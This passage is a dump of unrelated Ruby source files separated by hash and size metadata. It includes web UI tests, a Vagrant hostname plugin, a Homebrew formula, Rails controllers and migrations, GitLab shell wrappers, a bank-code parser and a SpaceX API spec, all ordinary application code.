@contact_info_card.verify_phone @local_phone
end
end
describe 'deleting' do
before(:all) do
@mobile_index = @contact_info_card.phone_type_index 'Mobile'
@local_index = @contact_info_card.phone_type_index 'Local'
end
it 'prevents a user deleting a preferred phone if there are more than two phones' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.click_delete_phone
@contact_info_card.phone_validation_error_element.when_visible WebDriverUtils.page_load_timeout
expect(@contact_info_card.phone_validation_error).to eql('One Phone number must be checked as Preferred')
end
it 'allows a user to delete any un-preferred phone' do
@contact_info_card.delete_phone @local_index
end
end
end
describe 'email address' do
before(:all) do
# Get rid of existing email if present
@contact_info_card.delete_email
end
describe 'adding' do
it 'allows a user to add an email of type "Other" only' do
@contact_info_card.click_add_email
expect(@contact_info_card.email_type_options).to eql(['Other'])
end
it 'requires that an email address be entered' do
@contact_info_card.click_add_email
expect(@contact_info_card.save_email_button_element.attribute('disabled')).to eql('true')
end
it 'allows a user to cancel the new email' do
@contact_info_card.click_add_email
@contact_info_card.click_cancel_email
@contact_info_card.email_form_element.when_not_visible(WebDriverUtils.page_event_timeout)
end
it 'requires that the email address include the @ and . characters' do
@contact_info_card.add_email('foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the . character' do
@contact_info_card.add_email('foo@bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the @ character' do
@contact_info_card.add_email('foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address contain at least one . following the @' do
@contact_info_card.add_email('foo.bar@foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain @ as the first character' do
@contact_info_card.add_email('@foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain . as the last character' do
@contact_info_card.add_email('foo@bar.', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'allows a maximum of 70 email address characters to be entered' do
@contact_info_card.add_email('foobar@foobar.foobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoo', true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, "Visible email types are '#{@contact_info_card.email_types}'") do
@contact_info_card.email_types.include? 'Other'
end
end
it 'prevents a user adding an email of the same type as an existing one' do
expect(@contact_info_card.add_email_button?).to be false
end
end
describe 'editing' do
before(:all) do
@index = @contact_info_card.email_type_index 'Other'
end
it 'allows a user to choose a different preferred email' do
# This example requires that a campus email be present, which might not be true
if @contact_info_card.email_types.include? 'Campus'
@contact_info_card.edit_email nil
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) { !@contact_info_card.email_primary?(@index) }
else
logger.warn 'Only one email exists, so skipping test for switching preferred emails'
end
end
it 'allows a user to change the email address' do
new_address = '[email protected]'
@contact_info_card.edit_email(new_address, true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, 'New email was not saved') do
@contact_info_card.email_addresses.include? new_address
end
end
it 'requires that an email address be entered' do
@contact_info_card.click_edit_email
@contact_info_card.email_form_element.when_visible(WebDriverUtils.page_event_timeout)
expect(@contact_info_card.save_email_button_element.attribute('disabled')).to be_nil
end
it 'prevents a user changing an email type to the same type as an existing one' do
@contact_info_card.click_edit_email
@contact_info_card.email_form_element.when_visible(WebDriverUtils.page_event_timeout)
expect(@contact_info_card.email_type?).to be false
end
it 'requires that the email address include the @ and . characters' do
@contact_info_card.edit_email('foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the . character' do
@contact_info_card.edit_email('foo@bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address include the @ character' do
@contact_info_card.edit_email('foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address contain at least one . following the @' do
@contact_info_card.edit_email('foo.bar@foo', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain @ as the first character' do
@contact_info_card.edit_email('@foo.bar', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'requires that the email address not contain . as the last character' do
@contact_info_card.edit_email('foo@bar.', true)
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { @contact_info_card.email_validation_error == 'Invalid email address' }
end
it 'allows a maximum of 70 email address characters to be entered' do
@contact_info_card.edit_email('foobar@foobar.foobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoobarfoo', true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) { @contact_info_card.email_types.include? 'Other' }
end
end
describe 'deleting' do
it 'allows a user to delete an email of type Other' do
@contact_info_card.delete_email
@contact_info_card.wait_until(WebDriverUtils.page_event_timeout) { !@contact_info_card.email_types.include? 'Other' }
end
end
end
describe 'address' do
# Make sure the user has both Local and Home addresses before proceeding
before(:all) do
@contact_info_card.load_page
@contact_info_card.address_label_element.when_visible WebDriverUtils.page_load_timeout
unless @contact_info_card.address_types.include? 'Local'
logger.warn 'Cannot find Local address, adding it'
@contact_info_card.add_address(addresses[0], addresses[0]['inputs'], addresses[0]['selects'])
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, 'Local address was not added') do
@contact_info_card.address_types.include? 'Local'
end
end
@local_index = @contact_info_card.address_type_index 'Local'
unless @contact_info_card.address_types.include? 'Home'
logger.warn 'Cannot find Home address, adding it'
@contact_info_card.add_address(addresses[0], addresses[0]['inputs'], addresses[0]['selects'])
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout, 'Home address was not added') do
@contact_info_card.address_types.include? 'Home'
end
end
@home_index = @contact_info_card.address_type_index 'Home'
@addresses = @contact_info_card.address_formatted_elements.length
end
describe 'editing' do
# Iterate through each address in the test data file to exercise the internationalized address forms
addresses.each do |address|
it "allows a user to enter an address for #{address['country']} with max character restrictions" do
address_inputs = address['inputs']
address_selects = address['selects']
@contact_info_card.load_page
@contact_info_card.edit_address(@local_index, address, address_inputs, address_selects)
@contact_info_card.verify_address(@local_index, address_inputs, address_selects)
sleep 30
end
it "requires a user to complete certain fields for an address in #{address['country']}" do
@contact_info_card.load_page
@contact_info_card.click_edit_address @local_index
@contact_info_card.clear_address_fields(address, address['inputs'], address['selects'])
@contact_info_card.click_save_address
@contact_info_card.verify_req_field_error address
end
it "allows a user to cancel the new address in #{address['country']}" do
@contact_info_card.click_cancel_address if @contact_info_card.cancel_address_button_element.visible?
current_address = @contact_info_card.formatted_address @local_index
@contact_info_card.click_edit_address @local_index
@contact_info_card.click_cancel_address
expect(@contact_info_card.formatted_address @local_index).to eql(current_address)
end
it "allows a user to delete individual address fields from an address in #{address['country']}" do
nonreq_address_inputs = address['inputs'].reject { |input| input['req'] }
req_address_inputs = address['inputs'] - nonreq_address_inputs
@contact_info_card.click_edit_address @local_index
@contact_info_card.clear_address_fields(address, nonreq_address_inputs, address['selects'])
@contact_info_card.click_save_address
@contact_info_card.verify_address(@local_index, req_address_inputs, [])
end
it 'prevents a user adding an address of the same type as an existing one' do
expect(@contact_info_card.add_address_button?).to be false
end
end
end
describe 'deleting' do
it 'prevents a user deleting an address of type Home/Permanent' do
@contact_info_card.click_edit_address @home_index
expect(@contact_info_card.delete_address_button?).to be false
end
it 'prevents a user deleting an address of type Local' do
@contact_info_card.click_edit_address @local_index
expect(@contact_info_card.delete_address_button?).to be false
end
end
end
end
end
| 51.144847 | 147 | 0.693535 |
33f50ca4f520d73183cc095bbf5ff06e10837f9d
| 603 |
require_relative '../../linux/cap/change_host_name'
module VagrantPlugins
module GuestPld
module Cap
class ChangeHostName
extend VagrantPlugins::GuestLinux::Cap::ChangeHostName
def self.change_name_command(name)
return <<-EOH.gsub(/^ {14}/, "")
hostname '#{name}'
sed -i 's/\\(HOSTNAME=\\).*/\\1#{name}/' /etc/sysconfig/network
sed -i 's/\\(DHCP_HOSTNAME=\\).*/\\1\"#{name}\"/' /etc/sysconfig/interfaces/ifcfg-*
# Restart networking
service network restart
EOH
end
end
end
end
end
| 25.125 | 93 | 0.578773 |
d5be74a651e282c677392a389d9a21926bf7c34b
| 889 |
class SwiftFormat < Formula
desc "Formatting technology for Swift source code"
homepage "https://github.com/apple/swift-format"
url "https://github.com/apple/swift-format.git",
:tag => "0.50200.1",
:revision => "f22aade8a6ee061b4a7041601ededd8ad7bc2122"
version_scheme 1
head "https://github.com/apple/swift-format.git"
bottle do
cellar :any_skip_relocation
sha256 "d8f72c33efc125e2904e1bec2c8942cca75d75cf81dcab7fcf08ba124af16170" => :catalina
end
depends_on :xcode => ["11.4", :build]
def install
system "swift", "build", "--disable-sandbox", "-c", "release"
bin.install ".build/release/swift-format"
doc.install "Documentation/Configuration.md"
end
test do
(testpath/"test.swift").write " print( \"Hello, World\" ) ;"
assert_equal "print(\"Hello, World\")\n", shell_output("#{bin}/swift-format test.swift")
end
end
| 31.75 | 92 | 0.697413 |
625c4130be50646db3c374da87aafef3312e8180
| 763 |
require "rails_helper"
require_relative "form/helpers"
RSpec.describe "Start Page Features" do
include Helpers
let(:user) { FactoryBot.create(:user) }
context "when the user is signed in" do
before do
sign_in user
end
it "takes you to logs" do
visit("/")
expect(page).to have_current_path("/logs")
end
end
context "when the user is not signed in" do
it "takes you to sign in and then to logs" do
visit("/")
click_link("Start now")
expect(page).to have_current_path("/account/sign-in?start=true")
fill_in("user[email]", with: user.email)
fill_in("user[password]", with: user.password)
click_button("Sign in")
expect(page).to have_current_path("/logs")
end
end
end
| 24.612903 | 70 | 0.651376 |
1c4a42dcd4b01fd44d3390d9f99c6fc1ec2dd89c
| 142 |
class Bike
def initialize
@broken = false
end
def working?
!@broken
end
def report_broken
@broken = true
end
end
| 8.352941 | 19 | 0.612676 |
380514eb6af1384a2486dbbee3c22bc0917791b7
| 1,755 |
# -*- encoding: utf-8 -*-
# stub: rails-html-sanitizer 1.0.2 ruby lib
Gem::Specification.new do |s|
s.name = "rails-html-sanitizer"
s.version = "1.0.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Rafael Mendon\u{e7}a Fran\u{e7}a", "Kasper Timm Hansen"]
s.date = "2015-03-10"
s.description = "HTML sanitization for Rails applications"
s.email = ["[email protected]", "[email protected]"]
s.homepage = "https://github.com/rafaelfranca/rails-html-sanitizer"
s.licenses = ["MIT"]
s.rubygems_version = "2.4.8"
s.summary = "This gem is responsible to sanitize HTML fragments in Rails applications."
s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<loofah>, ["~> 2.0"])
s.add_development_dependency(%q<bundler>, ["~> 1.3"])
s.add_development_dependency(%q<rake>, [">= 0"])
s.add_development_dependency(%q<minitest>, [">= 0"])
s.add_development_dependency(%q<rails-dom-testing>, [">= 0"])
else
s.add_dependency(%q<loofah>, ["~> 2.0"])
s.add_dependency(%q<bundler>, ["~> 1.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<minitest>, [">= 0"])
s.add_dependency(%q<rails-dom-testing>, [">= 0"])
end
else
s.add_dependency(%q<loofah>, ["~> 2.0"])
s.add_dependency(%q<bundler>, ["~> 1.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<minitest>, [">= 0"])
s.add_dependency(%q<rails-dom-testing>, [">= 0"])
end
end
| 39 | 105 | 0.638746 |
91ff48d5d3a1901d410160679dbb6fa72319f578
| 2,364 |
require 'nokogiri'
require 'json'
require 'uri'
def write_sublet_json(sublets)
File.open('data/sublet.json', 'w') do |f|
f.write JSON.pretty_generate(Hash[sublets.sort])
log 'Saved data/sublet.json'
end
end
def write_banks_json(banks)
File.open('data/banks.json', 'w') do |f|
f.write JSON.pretty_generate(Hash[banks.sort])
log 'Saved data/banks.json'
end
end
def match_length_or_nil(data, expected_length)
data = data.text.strip
data.length === expected_length ? data : nil
end
def get_value(data)
(data != nil && data.text.strip == 'Yes') ? true : false
end
def bank_data(bank_code, data, _ifsc)
{
code: bank_code,
type: data[3].text.strip,
# IFSC codes are 11 characters long
ifsc: match_length_or_nil(data[4], 11),
# MICR codes are 9 digits long
micr: match_length_or_nil(data[5], 9),
# IINs are 6 digits long
iin: match_length_or_nil(data[6], 6),
apbs: data[7].text.strip == 'Yes',
ach_credit: data[8].text.strip == 'Yes',
ach_debit: data[9].text.strip == 'Yes',
nach_debit: get_value(data[10])
}
end
def parse_upi
doc = Nokogiri::HTML(open('upi.html'))
header_cleared = false
count = doc.css('table>tbody')[0].css('tr').size
upi_patch_filename = '../../src/patches/banks/upi-enabled-banks.yml'
# Count the number of banks we have in our UPI patch file:
data = YAML.safe_load(File.read(upi_patch_filename), [Symbol])
if data['banks'].size != count
log "Number of UPI-enabled banks (#{data['banks'].size}) does not match the count on the NPCI website (#{count})}", :critical
log "Please check https://www.npci.org.in/what-we-do/upi/live-members and update src/patches/banks/upi-enabled-banks.yml", :debug
exit 1
end
end
def parse_nach
doc = Nokogiri::HTML(open('nach.html'))
header_cleared = false
sublets = {}
banks = {}
doc.css('table')[0].css('tr').each do |row|
if header_cleared
data = row.css('td')
ifsc = data[4].text.strip
bank_code = data[1].text.strip
sublets[ifsc] = bank_code if ifsc.size == 11 && ifsc[0..3] != bank_code
banks[bank_code] = bank_data(bank_code, data, ifsc)
end
header_cleared = true
end
write_sublet_json(sublets)
# This is where the upi:true parameter to banks.json gets added
banks = apply_bank_patches(banks)
write_banks_json(banks)
banks
end
| 27.811765 | 133 | 0.673858 |
62386943f92a0d68a6b6c305415f4502cea6d575
| 2,484 |
require_relative "base"
require "app/commands/create_customer"
require "app/commands/create_appointment"
require "app/queries/show_customers"
require "app/queries/offers_lookup"
require "app/queries/show_customer"
require "app/helpers/form_errors"
module Carpanta
module Controllers
class Customers < Base
get "/customers" do
result = Queries::ShowCustomers.call
haml :'customers/index', locals: {customers: result.value!}
end
get "/customers/new" do
form_errors = Helpers::FormErrors.new
haml :'customers/new', {}, {values: {}, form_errors: form_errors}
end
post "/customers" do
result = Commands::CreateCustomer.call(customer_attributes)
redirect("/customers") if result.success?
form_errors = Helpers::FormErrors.new(result.failure)
status 422
haml :'customers/new', {}, {values: customer_attributes, form_errors: form_errors}
end
get "/customers/:customer_id" do
result = Queries::ShowCustomer.call(params[:customer_id])
if result.success?
haml :'customers/show', locals: {customer: result.value!}
else
status 404
end
end
post "/customers/:customer_id/appointments" do
result = Commands::CreateAppointment.call(appointment_params)
redirect("/customers/#{appointment_params[:customer_id]}") if result.success?
form_errors = Helpers::FormErrors.new(result.failure)
offers_result = Queries::OffersLookup.call
status 422
haml :'customers/appointments/new', locals: {customer_id: params[:customer_id], offers: offers_result.value!, values: appointment_params, form_errors: form_errors}
end
get "/customers/:customer_id/appointments/new" do
offers_result = Queries::OffersLookup.call
form_errors = Helpers::FormErrors.new
haml :'customers/appointments/new', locals: {customer_id: params[:customer_id], offers: offers_result.value!, values: {}, form_errors: form_errors}
end
private
def customer_attributes
attributes = params.fetch(:customer, {}).deep_symbolize_keys
attributes.filter { |_, v| v.present? }
end
def appointment_params
attributes = params.fetch(:appointment, {}).deep_symbolize_keys
attributes = attributes.filter { |_, v| v.present? }
attributes.merge(customer_id: params["customer_id"])
end
end
end
end
| 32.684211 | 171 | 0.674718 |
91d1a2d081ff0ecd986e6084d1cc3e62ae105798
| 149 |
class AddEmergencyContactToRenewal < ActiveRecord::Migration[5.2]
def change
add_column :renewals, :emergency_contact_details, :text
end
end
| 24.833333 | 65 | 0.791946 |
ac122ddee541b762d3877de6974dd515174c2e23
| 783 |
class CreateClinicalAllergies < ActiveRecord::Migration[4.2]
def change
create_table :clinical_allergies do |t|
t.references :patient, index: true, null: false
t.text :description, null: false
t.datetime :recorded_at, null: false
t.datetime :deleted_at
t.references :created_by, index: true, null: false
t.references :updated_by, index: true, null: false
end
add_foreign_key :clinical_allergies, :patients, column: :patient_id
add_foreign_key :clinical_allergies, :users, column: :created_by_id
add_foreign_key :clinical_allergies, :users, column: :updated_by_id
# See Clinical::Patient#allergy_status for possible values
add_column :patients, :allergy_status, :string, null: false, default: "unrecorded"
end
end
| 39.15 | 86 | 0.731801 |
269dc873476dd79ad58e5c3739a47490f42d6b26
| 1,571 |
#
# Be sure to run `pod lib lint curl.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'curl'
s.version = '0.1.0'
s.summary = 'A short description of curl.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/billnie/ios_curl'
s.license = { :type => "MIT", }
s.authors = { "billnie" => "[email protected]" }
s.source = { :git => 'https://github.com/billnie/ios_curl.git', :tag => s.version.to_s }
s.ios.deployment_target = '8.0'
s.source_files = 'libcurl/**/*'
s.public_header_files = 'libcurl/*.{h,hpp}'
s.ios.vendored_library = 'lib/ios/*.a'
# s.ios.library = 'lib/ios/*.a'
s.libraries = 'ssl','crypto','curl','z'
# s.vendored_libraries = 'lib/ios/*.a'
s.subspec 'lib' do |ss|
ss.source_files = 'lib/ios/**/*.{a}'
end
#s.xcconfig = { "HEADER_SEARCH_PATHS" => "${PROJECT_DIR}/libcurl/",
#"LIBRARY_SEARCH_PATHS" => "$(PODS_ROOT)/lib/ios"
#}
end
| 33.425532 | 100 | 0.630808 |
1c61bf1f6b513719e0c0e4dd58a23941d7357c70
| 685 |
class AccessTokensController < ApplicationController
before_action :authenticate_user, only: :destroy
def create
user = User.find_by(email: login_params[:email])
if user && user.authenticate(login_params[:password])
login = Login.new(user, api_key)
if (token = login.call)
data = AccessTokenSerializer.new(login.access_token, token)
serialize(data)
else
handle_error(:invalid_parameter)
end
else
handle_error(:invalid_credentials)
end
end
def destroy
access_token.destroy
serialize({})
end
private
def login_params
params.permit(:email, :password, :first_name, :last_name)
end
end
| 21.40625 | 67 | 0.686131 |
1d5a71068c146abbb3b028b751863c8be530ba51
| 494 |
# Method Value Helper Module
module Puppet::Util::NetworkDevice::ValueHelper
def define_value_method(methods)
methods.each do |meth|
define_method(meth) do |*args, &block|
# return the current value if we are called like an accessor
return instance_variable_get("@#{meth}".to_sym) if args.empty? && block.nil?
# set the new value if there is any
instance_variable_set("@#{meth}".to_sym, (block.nil? ? args.first : block))
end
end
end
end
| 35.285714 | 84 | 0.672065 |
62c5391681a110be44da021a0cd6c0e77e78c1c8
| 1,913 |
# Copyright 2016 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
module Puppet::Parser::Functions
newfunction(:get_vmware_devices, :type => :rvalue, :doc => <<-EOS
Returns device name for internal vmware traffic
example:
get_vmware_devices()
EOS
) do |args|
bridge_interfaces = Array.new()
bond_interfaces = Array.new()
network_scheme = function_hiera_hash(['network_scheme', {}])
network_scheme['transformations'].each do |entry|
if entry.has_key?('bridge') and entry['action'] == "add-port"
bridge_interfaces.push(entry['name'])
end
if entry.has_key?('bond_properties') and entry['action'] == "add-bond"
bond_interfaces.push(*entry['interfaces'])
end
end
Dir.foreach('/sys/class/net') do |network_interface|
next if network_interface == '.' or network_interface == '..'
network_interface_path = "/sys/class/net/" + network_interface
if (not bridge_interfaces.include?(network_interface) and
not bond_interfaces.include?(network_interface))
int_driver = network_interface_path + '/device/driver/module'
if File.exist?(int_driver)
path = File.readlink(network_interface_path + '/device/driver/module')
driver_name = path.split('/')[-1]
return network_interface
end
end
end
end
end
| 37.509804 | 80 | 0.676947 |
01b8bda05c6741cf7b914735722447388cec42f7
| 7,427 |
module Gitlab
class Shell
class AccessDenied < StandardError; end
class KeyAdder < Struct.new(:io)
def add_key(id, key)
key.gsub!(/[[:space:]]+/, ' ').strip!
io.puts("#{id}\t#{key}")
end
end
class << self
def version_required
@version_required ||= File.read(Rails.root.
join('GITLAB_SHELL_VERSION')).strip
end
end
# Init new repository
#
# name - project path with namespace
#
# Ex.
# add_repository("gitlab/gitlab-ci")
#
def add_repository(name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path,
'add-project', "#{name}.git"])
end
# Import repository
#
# name - project path with namespace
#
# Ex.
# import_repository("gitlab/gitlab-ci", "https://github.com/randx/six.git")
#
def import_repository(name, url)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'import-project',
"#{name}.git", url, '240'])
end
# Move repository
#
# path - project path with namespace
# new_path - new project path with namespace
#
# Ex.
# mv_repository("gitlab/gitlab-ci", "randx/gitlab-ci-new.git")
#
def mv_repository(path, new_path)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'mv-project',
"#{path}.git", "#{new_path}.git"])
end
# Update HEAD for repository
#
# path - project path with namespace
# branch - repository branch name
#
# Ex.
# update_repository_head("gitlab/gitlab-ci", "3-1-stable")
#
def update_repository_head(path, branch)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'update-head',
"#{path}.git", branch])
end
# Fork repository to new namespace
#
# path - project path with namespace
# fork_namespace - namespace for forked project
#
# Ex.
# fork_repository("gitlab/gitlab-ci", "randx")
#
def fork_repository(path, fork_namespace)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'fork-project',
"#{path}.git", fork_namespace])
end
# Remove repository from file system
#
# name - project path with namespace
#
# Ex.
# remove_repository("gitlab/gitlab-ci")
#
def remove_repository(name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path,
'rm-project', "#{name}.git"])
end
# Add repository branch from passed ref
#
# path - project path with namespace
# branch_name - new branch name
# ref - HEAD for new branch
#
# Ex.
# add_branch("gitlab/gitlab-ci", "4-0-stable", "master")
#
def add_branch(path, branch_name, ref)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'create-branch',
"#{path}.git", branch_name, ref])
end
# Remove repository branch
#
# path - project path with namespace
# branch_name - branch name to remove
#
# Ex.
# rm_branch("gitlab/gitlab-ci", "4-0-stable")
#
def rm_branch(path, branch_name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'rm-branch',
"#{path}.git", branch_name])
end
# Add repository tag from passed ref
#
# path - project path with namespace
# tag_name - new tag name
# ref - HEAD for new tag
# message - optional message for tag (annotated tag)
#
# Ex.
# add_tag("gitlab/gitlab-ci", "v4.0", "master")
# add_tag("gitlab/gitlab-ci", "v4.0", "master", "message")
#
def add_tag(path, tag_name, ref, message = nil)
cmd = %W(#{gitlab_shell_path}/bin/gitlab-projects create-tag #{path}.git
#{tag_name} #{ref})
cmd << message unless message.nil? || message.empty?
Gitlab::Utils.system_silent(cmd)
end
# Remove repository tag
#
# path - project path with namespace
# tag_name - tag name to remove
#
# Ex.
# rm_tag("gitlab/gitlab-ci", "v4.0")
#
def rm_tag(path, tag_name)
Gitlab::Utils.system_silent([gitlab_shell_projects_path, 'rm-tag',
"#{path}.git", tag_name])
end
# Add new key to gitlab-shell
#
# Ex.
# add_key("key-42", "sha-rsa ...")
#
def add_key(key_id, key_content)
Gitlab::Utils.system_silent([gitlab_shell_keys_path,
'add-key', key_id, key_content])
end
# Batch-add keys to authorized_keys
#
# Ex.
# batch_add_keys { |adder| adder.add_key("key-42", "sha-rsa ...") }
def batch_add_keys(&block)
IO.popen(%W(#{gitlab_shell_path}/bin/gitlab-keys batch-add-keys), 'w') do |io|
block.call(KeyAdder.new(io))
end
end
# Remove ssh key from gitlab shell
#
# Ex.
# remove_key("key-342", "sha-rsa ...")
#
def remove_key(key_id, key_content)
Gitlab::Utils.system_silent([gitlab_shell_keys_path,
'rm-key', key_id, key_content])
end
# Remove all ssh keys from gitlab shell
#
# Ex.
# remove_all_keys
#
def remove_all_keys
Gitlab::Utils.system_silent([gitlab_shell_keys_path, 'clear'])
end
# Add empty directory for storing repositories
#
# Ex.
# add_namespace("gitlab")
#
def add_namespace(name)
FileUtils.mkdir(full_path(name), mode: 0770) unless exists?(name)
end
# Remove directory from repositories storage
# Every repository inside this directory will be removed too
#
# Ex.
# rm_namespace("gitlab")
#
def rm_namespace(name)
FileUtils.rm_r(full_path(name), force: true)
end
# Move namespace directory inside repositories storage
#
# Ex.
# mv_namespace("gitlab", "gitlabhq")
#
def mv_namespace(old_name, new_name)
return false if exists?(new_name) || !exists?(old_name)
FileUtils.mv(full_path(old_name), full_path(new_name))
end
def url_to_repo(path)
Gitlab.config.gitlab_shell.ssh_path_prefix + "#{path}.git"
end
# Return GitLab shell version
def version
gitlab_shell_version_file = "#{gitlab_shell_path}/VERSION"
if File.readable?(gitlab_shell_version_file)
File.read(gitlab_shell_version_file).chomp
end
end
# Check if such directory exists in repositories.
#
# Usage:
# exists?('gitlab')
# exists?('gitlab/cookies.git')
#
def exists?(dir_name)
File.exists?(full_path(dir_name))
end
protected
def gitlab_shell_path
Gitlab.config.gitlab_shell.path
end
def gitlab_shell_user_home
File.expand_path("~#{Gitlab.config.gitlab_shell.ssh_user}")
end
def repos_path
Gitlab.config.gitlab_shell.repos_path
end
def full_path(dir_name)
raise ArgumentError.new("Directory name can't be blank") if dir_name.blank?
File.join(repos_path, dir_name)
end
def gitlab_shell_projects_path
File.join(gitlab_shell_path, 'bin', 'gitlab-projects')
end
def gitlab_shell_keys_path
File.join(gitlab_shell_path, 'bin', 'gitlab-keys')
end
end
end
| 27.205128 | 84 | 0.595261 |
1115e33e4d8085b8b508eb7419b9d0f25b6a1e2c
| 1,236 |
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
require 'kaitai/struct/struct'
unless Gem::Version.new(Kaitai::Struct::VERSION) >= Gem::Version.new('0.9')
raise "Incompatible Kaitai Struct Ruby API: 0.9 or later is required, but you have #{Kaitai::Struct::VERSION}"
end
class ParamsPassArrayStr < Kaitai::Struct::Struct
def initialize(_io, _parent = nil, _root = self)
super(_io, _parent, _root)
_read
end
def _read
@str_array = Array.new(3)
(3).times { |i|
@str_array[i] = (@_io.read_bytes(2)).force_encoding("ascii")
}
@pass_str_array = WantsStrs.new(@_io, self, @_root, str_array)
@pass_str_array_calc = WantsStrs.new(@_io, self, @_root, str_array_calc)
self
end
class WantsStrs < Kaitai::Struct::Struct
def initialize(_io, _parent = nil, _root = self, strs)
super(_io, _parent, _root)
@strs = strs
_read
end
def _read
self
end
attr_reader :strs
end
def str_array_calc
return @str_array_calc unless @str_array_calc.nil?
@str_array_calc = ["aB", "Cd"]
@str_array_calc
end
attr_reader :str_array
attr_reader :pass_str_array
attr_reader :pass_str_array_calc
end
| 27.466667 | 112 | 0.685275 |
e9c9101d62c2feffee410eb44a33dc06ec154d55
| 6,749 |
require 'spec_helper'
describe SPACEX::Rockets do
context '#info', vcr: { cassette_name: 'rockets/info' } do
subject do
SPACEX::Rockets.info
end
it "returns all Rockets' when no id is passed info" do
first_subject = subject.first
expect(first_subject.id).to eq 1
expect(first_subject.active).to eq false
expect(first_subject.stages).to eq 2
expect(first_subject.boosters).to eq 0
expect(first_subject.cost_per_launch).to eq 6_700_000
expect(first_subject.success_rate_pct).to eq 40
expect(first_subject.first_flight).to eq '2006-03-24'
expect(first_subject.country).to eq 'Republic of the Marshall Islands'
expect(first_subject.company).to eq 'SpaceX'
expect(first_subject.height).to eq(
'meters' => 22.25,
'feet' => 73
)
expect(first_subject.diameter).to eq(
'meters' => 1.68,
'feet' => 5.5
)
expect(first_subject.mass).to eq(
'kg' => 30_146,
'lb' => 66_460
)
expect(first_subject.payload_weights).to eq [{
'id' => 'leo',
'name' => 'Low Earth Orbit',
'kg' => 450,
'lb' => 992
}]
expect(first_subject.first_stage).to eq(
'reusable' => false,
'engines' => 1,
'fuel_amount_tons' => 44.3,
'burn_time_sec' => 169,
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
}
)
expect(first_subject.second_stage).to eq(
'engines' => 1,
'fuel_amount_tons' => 3.38,
'burn_time_sec' => 378,
'thrust' => {
'kN' => 31,
'lbf' => 7000
},
'payloads' => {
'option_1' => 'composite fairing',
'composite_fairing' => {
'height' => {
'meters' => 3.5,
'feet' => 11.5
},
'diameter' => {
'meters' => 1.5,
'feet' => 4.9
}
}
}
)
expect(first_subject.engines).to eq(
'number' => 1,
'type' => 'merlin',
'version' => '1C',
'layout' => 'single',
'engine_loss_max' => 0,
'propellant_1' => 'liquid oxygen',
'propellant_2' => 'RP-1 kerosene',
'thrust_sea_level' => {
'kN' => 420,
'lbf' => 94_000
},
'thrust_vacuum' => {
'kN' => 480,
'lbf' => 110_000
},
